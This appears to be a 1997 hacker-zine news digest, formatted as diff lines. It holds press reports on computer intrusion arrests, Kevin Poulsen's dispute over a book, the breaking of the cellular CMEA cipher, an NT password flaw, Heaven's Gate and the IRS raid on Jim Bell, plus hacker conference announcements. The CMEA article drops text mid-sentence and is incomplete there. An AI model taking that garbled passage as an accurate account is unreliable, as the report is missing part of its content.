+this day, it is not known exactly what he did once he entered the
+system.
+
+The backup computer, unbeknownst to Salas, did capture a trail of
+changed passwords that led to the highest administrative level, giving
+Salas full access to the entire computer system, documents said.
+
+"Electronic mail (E-mail) regarding state service contracts worth
+approximately $400,000 between (a contractor) and DOIT resided on the
+DOIT system," said a summary of the facts in the case prepared for
+Salas's arrest.
+
+Special Agent Fred Adler of the Sacramento Hi-Tech Crimes Task Force,
+which arrested Salas, said Thursday the case is still under
+investigation and another arrest is possible.
+
+In his affidavit for the search warrant, Adler said on Sept. 9, Salas
+told Information Technology deputy director and chief counsel Alexis
+Schatten that he had contacted an attorney to initiate a lawsuit against
+a competing contractor for slandering him and other subcontractors.
+
+Adler said there were witnesses who had seen Salas "bringing up
+privileged information on (his computer) screen" and that Salas had
+"alluded" to others that he possessed confidential information about
+Information Technology's business dealings, court records show.
+
+Department officials told investigators that "numerous confidential
+communications exist on the their system relative to procurement,
+installation and maintenance of multi-million dollar, state computer
+systems," the affidavit said.
+
+"Knowledge of these communications could prove to be financially
+advantageous to firms involved in these processes," the affidavit said.
+
+Rich Halberg, department spokesman, declined to comment on the search
+warrant out of fear it might jeopardize an ongoing prosecution and
+investigation.
+
+He did say, however, that the department computer system does not
+contain actual contracts, but he did say that there may be E-mail
+pertaining to such contracts.
+
+"We are doing the right thing by going after this guy," Halberg said.
+
+"It is all too common in large companies and government to not want to
+go after the hacker because it is difficult to prove. Hopefully, this
+guy won't be in a position to do this again to another government
+agency," Halberg said.
+
+
+[=-------------------------------------------------------------------------=]
+
+title: (none) [Australian Phone Worker Rigs Radio Contest]
+source: COMTEX Newswire
+date: 12/10/96  7:48 PM
+
+SYDNEY, Dec. 11 (UPI S) -- An Australian telephone company worker who won 
+$50,000 Australian (U.S. $40,000) in a radio station's phone-in 
+competition has been charged with fraud after allegedly hacking into the 
+phone line. Brian Ronald Francis, who police say used his expertise to 
+ensure he was the 10th caller in the competition, has also been charged 
+with two more offenses relating to two other radio competitions he won 
+this year. 
+   
+
+[=-------------------------------------------------------------------------=]
+
+title: Hacker challenges `dark side' book
+author: Simson Garfinkel
+
+Special to the Mercury News
+
+KEVIN Poulsen was one of the most talented "dark side hackers" ever to
+phreak a phone call.
+
+For more than two years, Poulsen lived the life of a fugitive as part
+of the seedy Los Angeles underground. He made money by reprogramming
+Pacific Bell's computers for pimps and escort services, re-activating
+old telephone numbers and building a voice-mail network pairing
+prostitutes with their johns.
+
+And he cleaned up by messing with the phones used by Los Angeles radio
+stations, rigging their call-in contests so that he would always win
+the big bucks or the car.
+
+But Poulsen got caught and he spent more than five years in jail.
+
+Behind bars in 1993, Poulsen did what any phone phreak would do: He
+picked up the pay phone and started making collect calls. But these
+calls where different: they went to Jonathan Littman, a journalist in
+Mill Valley who had just published a magazine article about Poulsen's
+crimes and exploits and was about to write a book on the same topic.
+
+Poulsen wanted to make sure that Littman got the story right. He felt
+that Littman had made a lot of mistakes in the magazine article.
+
+Today, Poulsen feels somewhat betrayed by the journalist to whom he
+gave total access. After reading an advance copy of Littman's book,
+Poulsen says Littman has twisted the truth in order to make a more
+compelling story.
+
+"Most of my complaints about Littman's book are small things," said
+Poulsen, who is on parole and living in Sherman Oaks, a Los Angeles
+suburb. "He has major events right but then he changes the meaning of
+them by changing minor events and making up quotes."
+
+Littman stands by his work.
+
+The book, "The Watchman: The Twisted Life and Crimes of Serial Hacker
+Kevin Poulsen," is due to be published next month by Little, Brown and
+Co. It's an insider's look at the world of a criminal computer hacker,
+one of the most detailed yet published.
+
+"He was one of the first to hack the Internet and get busted for it,"
+said Littman, referring to Poulsen's 1984 arrest for breaking into
+university computers on the ARPAnet, predecessor to today's Internet.
+
+"They decided not to prosecute him because he was 17" when he was
+arrested, Littman said. Instead, Poulsen was hired by a Silicon Valley
+defense contractor.  "It was every hacker's dream -- to commit a crime
+and instead of going to jail, to get a job with what was a top think
+tank and defense contractor," Littman said.
+
+Soon, however, Poulsen was back to his old tricks -- with a vengeance,
+according to the book. He started physically breaking into Pacific
+Bell offices, stealing manuals and writing down passwords. Much of
+what he found went into a storage locker. But Poulsen couldn't handle
+his finances, and got behind in his rent.  When the locker company
+broke open Poulsen's lock his stash was discovered and a trap was
+laid. As the FBI closed in, Poulsen left town, a fugitive on the run.
+
+Guilty plea
+
+He was caught June 21, 1991, and spent nearly three years in pre-trial
+detention. On June 14, 1994, in federal court in Southern California,
+he pleaded guilty to seven counts of computer fraud, interception of
+wire communications, mail fraud, money laundering and obstruction of
+justice. He was then transferred to Northern California to face a
+spying charge, based on his possession of material the government
+called classified. He pleaded guilty to fraud, possession of
+unauthorized access devices and fraudulent use of a Social Security
+number, and was released June 4, last year.
+
+The Watchman is Littman's second book on the computer hacker
+underground. His first, "The Fugitive Game," followed the exploits of
+hacker Kevin Mitnick, who was on the run and eventually caught by
+computer security expert Tsutomu Shimomura and New York Times reporter
+John Markoff. Shimomura and Markoff wrote their own book describing
+the chase, and they both objected to Littman's version of the events.
+
+For his part, Poulsen seems most angry about the implication of the
+new book's title -- that he was somehow obsessed with eavesdropping
+and largely acted alone.
+
+Only two wiretaps
+
+In the book, Littman has Poulsen listening to dozens of conversations
+ -- even wiretapping the telephones of people trying to sell used
+equipment through newspaper classified ads, to see if they are being
+honest with their prices.
+
+Poulsen insists that he wiretapped the telephones of only two people:
+another hacker who was also an FBI informant and his high-school
+girlfriend.
+
+"He also reports that I obsessively followed the details of every
+escort date, including details of the tricks," Poulsen says, among
+other complaints. "He made that up. Totally made that up."
+
+Littman denies making up quotes, and insists that everything in the
+book was told to him by one of the participants.
+
+"I've written a book about a very complicated story about
+controversial people who had very different versions of what
+happened," Littman said. "I've done the best I can to view them
+objectively. Somebody else might view them differently, and the
+participants obviously have a subjective perspective. My views are in
+the book."
+
+But Poulsen says that Littman's fundamental premise is flawed. "John
+had a problem in writing this book," Poulsen said. "He wanted to sell
+it as the troubled loner-hacker-stalker guy. The problem is I had five
+co-defendants and it is hard to portray someone as a troubled loner
+when you have five other people making it happen."
+
+Not a loner
+
+Ron Austin, Poulsen's friend and co-conspirator, agrees. "Littman has
+to write an interesting book, I guess," he said. "He downplays the
+role of a lot of people, but I think that's because he is writing a
+book about Kevin. My role is downplayed." Austin also said the role of
+Justin Petersen, a hard-rocking hacker and co-conspirator is
+underplayed.
+
+Austin, also on parole, said he is concerned that the controversy
+regarding Littman's portrayal of Poulsen might obscure some of the
+more important issues raised by Littman's book: That the FBI engaged
+in widespread wiretapping of foreign consulates in the San Francisco
+area, the FBI's apparent hiring of an informant to commit illegal acts
+on the agency's behalf, and that the FBI's apparent ability to decrypt
+files on Poulsen's computer that had been encrypted with the
+U.S. government's Data Encryption Standard, a popular data-scrambling
+algorithm.
+
+The FBI office in Los Angeles declined to comment on the Poulsen
+case. A representative of the FBI's Washington office said, "We
+normally do not comment on books that are coming out until we have had
+an opportunity to review the book."
+
+As a condition of his plea bargain, Poulsen is prohibited from
+discussing FBI wiretaps.
+
+Littman said he feels "lucky as a writer to have been able to spend
+some time with Poulsen and these other characters in the story."
+
+"One thing about Poulsen is he really had a very highly developed
+ethical model that he believed in," Littman said. "He found it
+challenged by his circumstances and the people he associated with. I
+found it fascinating to see how he resolved this age-old computer
+hacker ethic with a changing world."
+
+
+
+
+Cellular Code-breakers Blame Standards Process
+577 Words
+4312 Characters
+04/03/97
+TR Wireless News
+Copyright (c) 1997 BRP Publications, Inc.
+
+  Computer scientists claim they have demonstrated how to break the
+industry-standard code that encrypts cellular phone calls-a discovery
+they termed "a setback to the U.S. cellular telephone industry."  The
+code-breakers included Bruce Schneier of Counterpane Systems, a
+Minneapolis consulting firm, and graduate student David Wagner of the
+University of California at Berkeley.
+
+  They criticized the wireless industry's technical standards-setting 
+process for establishing what they consider a weak standard, and they
+attacked the government for "hamstringing emerging cellular security
+technology."  Release of their announcement and academic paper was timed
+to coincide with congressional hearings on encryption policy.
+
+  The researchers' press release observes that the digital cellular
+system uses encryption to "scramble voice communications." Their paper,
+Cryptanalysis of the Cellular Message Encryption Algorithm (CMEA),
+concerns cellular phone keypad entries, but not voice conversations. Mr.
+Schneier told TRWN that the digital cellular voice encryption standard
+is "so incredibly vulnerable" to decryption that it was "not worth
+writing about."  The voice standard's fundamental code was broken by the
+"Union Army in the Civil War," he added.
+
+  The researchers didn't challenge either the subscriber 
+"authentication" or the "fingerprinting" antifraud procedures now common
+in the cellular service. Authentication and fingerprinting technologies
+"are not compromised by the cryptography announced today," according to
+the Cellular Telecommunications Industry Association.
+
+  The technical paper describes a cryptographic "attack" on the CMEA.
+Such an attack, in practice, would require analysis of data recovered
+from recorded calls, received on radios capable of decoding digital
+cellular transmissions. Such radios aren't easily available; the common
+"scanner" can't receive them.
+
+  "We did not touch a cellular phone in our analysis, and there is no
+commercial equipment available that could receive digital cellular
+signals. We worked with a paper standard only," Mr. Schneier said. The
+attack took "minutes or hours" on a Pentium-class personal computer, and
+to comply with U.S. laws and who agreed not to "misuse" the
+information. Federal agencies, including NSA, had certain
+"sensitivities" as to the encryption power of CMEA and its lawful export
+under then-current laws, he said. These concerns led to CMEA's being
+somewhat less "robust" than the authentication algorithm.
+
+   Updating CMEA to address the concerns raised by the cryptographers'
+announcement has become the "highest priority" for the TR45 committee at
+its upcoming meetings, Mr. Marinho said. He added that the shift in
+federal jurisdiction over encryption from the State Department to the
+Commerce Department has enabled TIA to move forward in improving CMEA.
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+TRENDS IN BRIEF...
+285 Words
+2117 Characters
+04/07/97
+Report on Microsoft
+Copyright 1997 Information Access Company. All rights reserved.
+
+  A trade publication reports that a "major" security flaw has been
+uncovered in Microsoft's network operating system, Windows NT.
+
+  The flaw could enable a user dialing in from a remote location to
+unscramble encrypted information -- including a corporate network's
+entire registry of user passwords -- and display it as plain text. EE
+Times Online (http://www.eet.com) said the discovery is especially
+troublesome for Microsoft because it has tried to position NT as more
+secure network server than alternatives such as Unix. Two professional
+security technologists wrote the code for the "hack" that found the
+flaw.
+
+  The code has been verified by several experts and is making the
+rounds on the Internet via an mailing list frequented by skilled
+hackers with an interest in NT-security issues. The potentially
+password-cracking code is the third major security flaw found in NT in
+as many months and follows recent revelations of security holes in
+Microsoft's Internet Explorer Web browser. The software giant's
+security technology has come under closer scrutiny by the hacking
+community as NT and Internet Explorer have found broader market
+acceptance... At least a dozen major companies have joined the race to
+buy, invest or strike strategic alliances with small Java developers,
+according to a trade publication report. Driven by the growing
+popularity of Java and the need to get products to market more quickly
+than they can be developed internally, these vendors frequently are
+courting the same developers to shore up their Java offerings. One
+developer, while declining to comment on any talks his company has had,
+named Sun Microsystems Inc., Microsoft, Novell Inc., Netscape
+Communications Corp. and IBM/Lotus as the top Java hunters, followed by
+a second tier of tools vendors that include Symantec Corp.
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+Social Security officials insist Web info is secure
+
+April 8, 1997
+Web posted at: 12:10 a.m. EST 
+
+WASHINGTON (CNN) -- Social security records now available through the
+Internet pose few security threats to the individuals who request them
+administration officials said Monday. 
+
+For the past month, Americans have had the option of having their Personal
+Earnings and Benefit Estimate Statement (PEBES) sent to them electronically.
+The information previously had to be mailed to them in a process that took as
+long as six weeks -- and at a cost of millions of dollars in postage each year.
+
+Phil Gambino, a spokesman for the Social Security Administration, said the top
+priority of the new program is maintaining privacy, and several security 
+features have been built into the new system to do just that. 
+
+"The information going back and forth between the requester and Social Security
+is encrypted, so if it gets intercepted in the middle, it can't be interpreted -- it
+would look like jibberish," he said. 
+
+Auditors also are able to trace the origin of a request to the exact personal
+computer used to make it, he said. 
+
+Still, critics concerned about privacy rights are worried. 
+
+"As soon as crooks start exploiting this service to get other people's
+information, Social Security is going to have a real problem on its hands," 
+Evan Hendricks, chairman of the U.S. Privacy Council in Washington, told USA 
+Today.
+
+The newspaper identified various types of potential abuse: potential employers
+could get the salary history of job applicants; co-workers could determine how
+much fellow employees make; landlords could use the information to determine
+whether someone can afford an apartment. 
+
+While Gambino insisted someone would have to "go through a great deal of
+effort" to steal information, even the PEBES Web page offers a disclaimer: "We
+cannot absolutely guarantee that the information you are sending will not be
+intercepted by others and decrypted." 
+
+Indeed, one person in January decoded an encryption code similar to the one
+used to secure the Social Security information. 
+
+Responding to a challenge from a computer security firm, a graduate student
+cracked the code in 3 1/2 hours. He used 250 work stations to do test 100 
+billion code combinations per hour to crack a 40-bit electronic key. The
+PEBES page is encrypted with at least a 40-bit key, although it could have 
+128 bits or more. 
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+Web authors linked to suicide sect 
+By Alan Boyle and Paul Chavez 
+MSNBC 
+
+      Members of the religious community who died in Rancho Santa Fe
+earned money by designing business sites on the World Wide Web and
+may have tied their death pact to coincide with the return of the
+Hale-Bopp comet. 
+
+     Farewell tape shows cultists' calm resolve Cult built an 'earth ship' of 
+old tires Rendezvous with mortality Cults growing on the Net How to know if a 
+loved one is in a cult Talk about this story in our News BBS.
+
+     The group did business as Higher Source Contract Enterprises and
+designed a variety of sites, including the San Diego Polo Clubs home
+page on the World Wide Web.
+
+     Commander Al Fulmer of the San Diego County Sheriffs Office said
+during a Thursday press conference that the group also called itself
+Heavens Gate. A Web site using that name makes a connection
+between the Hale-Bopp comet, which last visited Earth about 4,200
+years ago, and a time of closure.
+
+     The Heavens Gate site was found under several addresses
+Thursday, including one Internet address located in Romania. Most of
+the sites were either pulled off the World Wide Web later Thursday or
+were made inaccessible because of high volumes of Internet traffic.
+Katie Greene, a spokesperson for Internet service provider
+Concentric Network, located in Californias Silicon Valley south of San
+Francisco, said they have been providing Internet service to the group
+since March 1995.
+
+     A section of one Heavens Gate site outlined the groups beliefs and
+said that 2,000 years ago a crew member of the kingdom of heaven took
+over the body of Jesus. This Christ-like member prepared others for
+departure into the kingdom of heaven. 
+
+     The site said the groups mission was the same.
+
+I am in the same position to todays society as was the One that
+was in Jesus then, the sites author wrote. My being here now is
+actually a continuation of that last task as was promised, to those who
+were students 2,000 years ago. ... Our only purpose is to offer the
+discipline and grafting required of this transition.
+
+     Another section of the site described two leaders, a male and
+female, who in the early 1970s took over two bodies, which they called
+vehicles.
+
+     The Heavens Gate group may be a high-tech reincarnation of a
+1970s community that had been dubbed the UFO Cult.
+
+     Strong similarities exist between the 1970s group and information
+found on World Wide Web sites connected to Heavens Gate. The two
+leaders of the the so-called UFO cult have been previously identified in
+news reports as Houston residents. News reports also said the female
+leader is dead. 
+
+    One page called Last Chance to Evacuate Earth Before Its
+Recycled outlined the groups history and mission. The author of the
+page identified himself as Do  as in the musical tone.
+
+    The author said he was related to the Ti and Do that made news in
+1975 as the UFO cult. The author also said that his female partner, Ti,
+left earth in 1985.
+
+    Much of the information on the site outlined how representatives
+from a Kingdom Level Above Human were on Earth to escort others to
+the higher level.
+
+    The site also had a section detailing its position against suicide by
+non-members.  Larry Trachte, professor of religion at Wartburg College, said 
+that suicide often has a different meaning among religious groups and cults. 
+
+
+    Death is seen more in an Eastern perspective, Trachte said. So
+there isnt a sense that all this is tragic. Its more the spiritual, mental
+orientation of these people that believe this way. They believe this life
+is just one in an ongoing cycle or series or wheel of life. And ending this
+life is like opening a window or door and moving into another existence.
+
+    Trachte said he took some solace in the news that no children were
+involved with the group. 
+
+    He also was not surprised with the connection to the Hale-Bopp comet.
+
+    Throughout history, the heavens and the signs of the stars and
+peculiar events like comets have signified extraterrestrial powers,
+Trachte said. Its not totally surprising that a comet would trigger such a
+response.
+
+    He said the group was unique in that it apparently mixed modern
+phenomena, such as UFOs, computers, the comet and the Internet, with
+age-old beliefs of being swept into heaven.
+
+    Even in the Christian experience you have that recorded experience
+of people from another country following a heavenly display or
+revelation, which to them pointed to the birth of Christ, Trachte said.
+
+    The Heavens Gate group also designed pages publicizing
+Pre-Madonna, an album of Madonnas early songs;
+1-800-HARMONY, a music and video mail-order operation; British
+Masters, a clearinghouse for auto parts; and Keep the Faith, a site
+devoted to contemporary Christian music and news. 
+
+    The group used advanced Web page design and technology,
+including Java and Javascript, animated images and virtual reality
+modeling language.
+
+    Beverly Hills businessman Nick Matzorkis, who runs the
+Pre-Madonna site, told authorities that he now employs a former
+member of the Higher Source group. Matzorkis said that members sent
+the employee  whom he identified only as Rio  two videotapes this week
+that described their intentions to commit suicide.  
+
+    Members of Heavens Gate believed it was time to shed their
+containers, perhaps to rendezvous with a UFO they believed was
+traveling behind the Hale-Bopp comet, Matzorkis told NBCs Today
+show.
+
+    The author identified as Do said on the Heavens Gate site, dated
+Sept. 29, 1996, that time was short.
+
+    The end of this civilization is very close, the site said. The end of
+a civilization is accompanied by a spading under, refurbishing the
+planet in preparation for another civilization. And the only ones who
+can survive that experience have to be those who are taken into the
+keeping of the Evolutionary Level Above Human. 
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+Hecklers hack at human bugs that crawl the Web
+
+        A couple of weeks ago the U.S. public was distracted by issues of
+     Internet pornography. The U.S. Supreme Court was considering the
+     Communications Decency Act, a law meant to control obscenity
+     supposedly bombarding youthful computer users.
+
+        Meanwhile Marshall Herff Applewhite and 38 members of the Heaven's
+     Gate cult were updating their Web site, laying in a supply of new
+     Nike sneakers, and preparing to kill themselves.
+
+       Politicians and clergy had a firm grip on the anti-porn franchise.
+     Who, on the other hand, was tackling murderous mass delusion?
+
+        The answer: a few skeptics and hecklers, and they did a good job
+     of it.
+        Their postings continue to collect in the forums of Usenet where
+     cult followers put their prophecies about the alien spaceship that
+     supposedly follows the comet Hale-Bopp.
+
+        "It seems odd that a higher life form would prefer us paltry
+     humans to wear black Nikes with a white "swoosh' as our ceremonial
+     sending off garb," sneers a contributor to sci.astro, a group of
+     otherwise sensible astronomers. "What is wrong with Reebok or
+     Adidas? Is there a conspiracy here?"
+
+        Criticism also focused on syndicated radio host Art Bell, who has
+     promoted the astronaut-messiah movement. He used to talk more about
+     evil government, until the Oklahoma City federal building bomb went
+     off. Lately his agenda has been heavier on spaceships.
+
+        "Art's role in their deaths was that of a liar and snake oil
+     salesman, trafficker in junk science, a promoter of charlatans and
+     their wares, and a parasitic peddler of pernicious poppycock," says a
+     contributor "decieving you're some sort of chosen spokesman
+     for some trumped-up alien scam so you can sell your booklet," says
+     another.
+
+        A preacher surrounding himself with goons in a sealed-off temple,
+     a con artist fleecing followers in a distant commune, even an
+     infomercial huckster on radio or television, is protected from
+     opponents who might distract his victims.
+ 
+       But how many of Jim Jones' followers might have been deterred from
+     going to Guyana with him, and tasting his deadly brew, had the
+     Internet been in wider use 20 years ago, complete with its noisy
+     skeptics countering his preachings?
+
+        Jones took more than 900 lives with him. Applewhite only got 38
+     to go along. That's progress.
+
+        "Think of it as evolution in action. Or maybe they were right and
+     are aboard the mothership now. Either way, it's 39 fewer idiots
+     cluttering up the planet," says another contributor. This does not
+     encourage copycats.
+
+        Skeptical argument is not limited to religious themes. In
+     Usenet's thousands of newsgroups, forums cover politics, social life,
+     dating and marriage, most of the arts and sciences, journalism and
+     international relations. To some degree, they are all the scenes of
+     noisy, sometimes sarcastic and even profane debate. Group members
+     even patrol for porn, often vigorously repelling sexual-oriented
+     postings with the same forensic muscle.
+
+        Anyone can join in soc.couples, alt.fan.rush-limbaugh,
+     alt.politics.clinton, alt.politics.british, alt.history.what-if,
+     rec.arts.movies, sci.military, alt.journalism and other cyberbrawls.
+     They argue feminism, political campaign funding, TV violence,
+     landmines, sex and Nazism. There is even a fun group that regularly
+     argues the perennial subject of world domination by hamburger
+     franchise (it's called alt.nuke.the.usa).
+
+        Heckling and skepticism? Indeed, as it should be. 
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+The Netly News Network
+April 3, 1997
+
+IRS raids a cypherpunk
+by Declan McCullagh (declan@well.com)
+
+
+     Jim Bell's first mistake was publishing an
+essay describing how disgruntled citizens could
+kill off Federal government agents by using
+anonymous betting pools and digital cash. His
+second mistake was informing the IRS that the
+agency had no legal authority to tax him.
+
+     About twenty armed IRS agents and other
+Federal police swarmed into Bell's home in
+Washington state on Tuesday morning, hunting for
+evidence that Bell's "Assassination Politics"
+essay had come to fruition. They expropriated
+Bell's three computer systems, two guns and even
+a solitary mouse cable. The Feds were taking no
+chances: Since Bell's voluminous Net postings
+mentioned tax collectors, agents from the BATF,
+FBI, DEA, and local police forces joined the
+raid.
+
+[...]
+
+     The raid stemmed from a six-month tussle
+between Bell and the IRS, which began in November
+1996 when the 38-year old computer engineer
+demanded a hefty tax refund and threatened to
+convene his own "common-law court" if it was
+refused. That grabbed the Feds' attention. (So
+did the actions of the "Multnomah County Common
+Law Court," which apparently met in January to
+convict IRS agents and Attorney General Janet
+Reno of "theft by deception.") In February, IRS
+agents seized Bell's 1986 Honda as payment for
+back taxes -- and found inside it a printout of
+his "Assassination Politics" essay. "
+
+[...]
+
+     And it was, ultimately, a Federal magistrate
+who signed the search warrant on 9:02 am on March
+28 at the request of the IRS. Jeffrey Gordon, an
+inspector in the IRS' Internal Security Division,
+details in an 10-page affidavit how he traced
+Bell's use of allegedly fraudulent Social
+Security Numbers, how he learned that Bell had
+been arrested in 1989 for "manufacturing a
+controlled substance," how he found out that Bell
+possessed the home addresses of a handful of IRS
+agents. Gordon's conclusion: Bell planned "to
+overthrow the government." The IRS investigator
+says in his affidavit that Bell's "essay details
+an illegal scheme by Bell which involves plans to
+assassinate IRS and other government officals...
+I believe that Bell has begun taking steps to
+carry out his Assassination Politics plan."
+
+[...]
+
+
+
+[=-------------------------------------------------------------------------=]
+                        Security/Hacker Conferences
+[=-------------------------------------------------------------------------=]
+
+                  The 1997 Summer Security Conference
+
+                            "SUMMERCON IX.V"
+
+			    May 31st, 1997
+
+			     Atlanta, GA
+
+  This is the official announcement and open invitation to the nine
+and 1/2 summer security conference, Summercon.  A long time ago,
+Summercon was an invite-only hacker gathering held annually in St.
+Louis, Missouri. Starting in 1995, SummerCon became an open event to
+any and all interested parties:  Hackers, Phreaks, Pirates, Virus
+Writers, System Administrators, Law Enforcement Officials,
+Vigilantes, Neo-Hippies, Secret Agents, Teachers, Disgruntled
+Employees, Telco Flunkies, Journalists, New Yorkers, Programmers,
+Conspiracy Nuts, Musicians, Nudists, and Rug Sucking Wannabes.
+  This con is going to be different than previous SummerCons.  First
+off, there are two other major cons happening this summer, Defcon
+and Beyond HOPE.  If you want to see good technical speakers, meet a
+ton of hackers, and have a good time for a couple days, I suggest
+you go to one or both of those cons.  DefCon information is at
+http://www.defcon.org, Beyond HOPE info is at http://www.2600.com.
+
+  So why have SummerCon at all?  Well, its a tradition, and most
+of the people I talked to said we should have it anyways.  But,
+because of the other 2 cons, I am really aiming just to make this
+a fun weekend with yer friends in a new city, not a technical
+hacker gala.  If you want to learn something, go to HOPE or
+Defcon.  If you want to meet hackers, go to HOPE or DefCon.  If
+you have to choose one con to go to this summer, this one should
+NOT be it.  If you are already going to DefCon and HOPE, and still
+have one more weekend you want to waste this summer, this is the
+perfect place for you.
+  If you are a criminal, if you are an anarchist, if you are
+interested in pulling fire alarms or breaking things, don't come
+to this con; we don't want you here and you wouldn't like us
+anyhow.
+  Why 9.5?  Well, SummerCon X should be this huge major security
+conference, but with HOPE this year, we didn't think it was the
+right year to do another one of those.  So, we'll have SummerCon X
+next year, this one is just going to be a little party.
+
+
+LOCATION
+
+It will be held in Atlanta, GA, but we haven't actually figured
+out WHERE in Atlanta.  That's because this is a pre-release of the
+announcement, when this becomes official, we'll fill in the
+details.
+
+
+DIRECTIONS
+
+Fly to Hartsfield International Airport, look for the hackers.
+
+
+CONFERENCE INFO
+
+It has always been our contention that cons are for socializing.
+"Seekret Hacker InPh0" is never really discussed except in private
+circles, so the only way anyone is going to get any is to meet new
+people and take the initiative to start interesting conversations.
+
+Because of this, the formal speaking portion of Summercon will be
+held on one day, not two or three, leaving plenty of time for
+people to explore the city, compare hacking techniques, or go
+trashing and clubbing with their heretofore unseen online
+companions.  Futhermore, except for maybe getting Mudge up on
+stage to blow us all away with some cool technical details, it is
+probably a pretty good bet that the speeches will end up being
+boring, long, and a complete waste of time.  Don't come to
+SummerCon to learn anything, because you won't.
+
+If you are coming from out of town and want the full
+hacker/tourist experience, we will be having a specially scheduled
+2600 meeting Friday, May 30th, at 6pm at Lenox Mall food court.
+If you don't know how to get there, just ask, everyone in Atlanta
+knows.
+
+The formal conference will be held on Saturday, May 31st, 1997,
+from 10am to 5pm (with a break for lunch).  There will be a
+variety of speakers, panel discussions, demonstrations, and other
+events that will hopefully keep everyone entertained; if not you
+can always start drinking early.
+
+No video or audio tapes will be allowed in the conference room.
+No still photography will be permitted in the conference room
+without prior permission of all those being photographed.
+Violation of these policies will result in you being asked to
+leave the conference.
+
+There will be no selling of t-shirts, disks, firewalls, payphones,
+etc. in or around the conference area without prior permission of
+the organizers, and you WON'T get permission.  We can't keep you
+from selling t-shirts in your hotel room, but we can keep you away
+from the actual conference area, and we can probably get you
+kicked out of the hotel for soliciting, and if we can, we will.
+T-Shirt sales is where we make up all the money we spend putting
+on the conference, and so we will be the only ones selling them.
+If you want to sell t-shirts, go have your own con.
+
+If you are interested in demoing or selling something, please
+contact us at the address listed at the bottom.  If you offer us
+money, we might let you do it.
+
+
+SPEAKERS
+
+The speakers list for Summercon X is still being finalized, but it
+is sure to be much less interesting than previous years.  In fact,
+right now we have NO speakers, and probably we won't until the day
+of the con.  So again, don't come to summercon for the speakers.
+
+If you are an expert in some aspect of computer, network, or telco
+security and are interested in speaking at Summercon, please
+contact us to discuss the possibility further at the address
+listed at the end of this document.. We won't pay you, don't ask.
+
+We are also going to be having short speeches by real hackers or
+phreakers giving their own perspective on some issue or insight
+into a new technology.  This is an open invitation for you hackers
+to be heard; just provide us with a brief outline of the topic you
+will be covering and the amount of time you will take (suggested:
+5 - 15 minutes) at the address listed below.
+
+
+COSTS
+
+Costs for SummerCon X are as follows, these are same rates as last
+year, which I think is pretty good.  There will be NO refunds, and
+if you annoy any of the organizers, we reserve the right to throw
+you out, and you won't get your money back.
+
+      Secret Service / FBI Rate: $500.00
+Government / Institutional Rate: $ 80.00
+       Hacker / Individual Rate: $ 20.00
+
+
+Members of the United States Secret Service or Federal Bureau of
+Investigations, and anyone that has in the past or currently is
+providing information or services to the Secret Service or FBI are
+required to pay the 'Secret Service / FBI Rate'.
+
+Employees of a local, state, or federal government, members and
+associates of any L.E.O., must pay the 'Government / Institutional
+Rate'.
+
+Anyone that does not fit into one of the above categories is
+eligible for the 'Individual / Hacker Rate'.
+
+Due to historical lack of interest, there will not be
+pre-registration for the conference.  Registration will begin at
+10am the day of the conference, and will continue for the duration
+of the conference or until the meeting facilities have reached their
+capacity.  Since the latter is likely to occur, it is suggested you
+don't oversleep.
+
+No purchase orders, checks, money orders, foreign currency, stock
+certificates, IOUs, or coins will be accepted for registration.
+Secret Service agents, small unmarked bills only, please.
+
+Bring money for t-shirts, they are cool, and this year we will make
+enough for everyone (we hope).
+
+HOTEL INFORMATION
+
+Still working on this part.
+
+The cost for a double occupancy room at the hotel is $XX.  There is
+no special conference rate, there is no need to mention you are with
+a conference at all, the people in reservations probably won't know
+what you are talking about anyhow.
+
+If the hotel is damaged in any manner, you are going to pay for it,
+and you will probably end up in jail.  And even if you are lucky
+enough to get away with it, the rest of the hackers staying at the
+hotel will end up paying for it, and I'm sure that's going to make
+you a well-liked and respected hacker, especially among some of the
+bigger hackers who might feel tempted to inflict bodily harm on
+someone who causes any damage to the hotel.  Please act responsibly,
+don't drink and drive, chew all your food before you swallow, don't
+swallow your gum, and recycle.
+
+Anyhow, if you pull a fire alarm, if you damage a room, if you spit
+on the floor, and any of the organizers, or any of their friends
+find out, we are going to call the police and have you arrested.  In
+fact, we are making a game out of it.  If anyone does any damage to
+the hotel, we will give whoever tells us what person or persons did
+it $100 in cash if we are able to get that person taken to jail.
+
+
+CONTACTING SUMMERCON ORGANIZERS
+
+
+You can contact the Summercon organizers through e-mail.  If you
+haven't figured out e-mail yet, you probably shouldn't be coming to
+Summercon.
+
+As a final note, if you are planning on coming to Summercon, we
+would appreciate you sending e-mail to us with the subject of "GOING
+TO SCON" or something similar, just so that we have a rough idea of
+how many people are going to show up.
+
+
+    E-mail:     scon@2600.com
+
+[=-------------------------------------------------------------------------=]
+
+      --== Hacking In Progress ==--
+
+    8th, 9th and 10th of August 1997
+        Near Almere, Netherlands
+
+          http://www.hip97.nl/
+             info@hip97.nl
+
+
+
+Welcome to the HIP announcement list. We are not
+alone! More than 1600 (!) of you subscribed to this
+list.
+
+As you probably already know what HIP is about, this
+announcement will focus on how you can help us and how
+you can stay informed about HIP. Please read the FAQ
+for more common questions.
+
+
+What is HIP?
+------------
+
+HIP is a place for hackers, artists, activists and
+many, many others to network themselves, both in the
+social and electronic sense of the word. HIP is a
+do-it-yourself event. We, the organizers, will provide
+the infrastructure, such as large tents, showers,
+toilets and large amounts of reliable electrical power
+and network connectivity. We'll also arrange for a
+basic set of workshops and lectures, mainly dealing
+with the social and political aspects of information
+technology, security, Internet, access to technology,
+new developments, cryptography and other 'hacker-
+related' topics that come to mind. We are open to
+suggestions for other fields of interest.
+
+At this moment we are working on discussions and
+workshops about smartcard security, Tempest attacks,
+the SPAM threat, virtual communities, cryptography and
+the law (Trusted Third Parties and Key Recovery), a
+tele-presence experiment, activism on the Net, and
+much more.
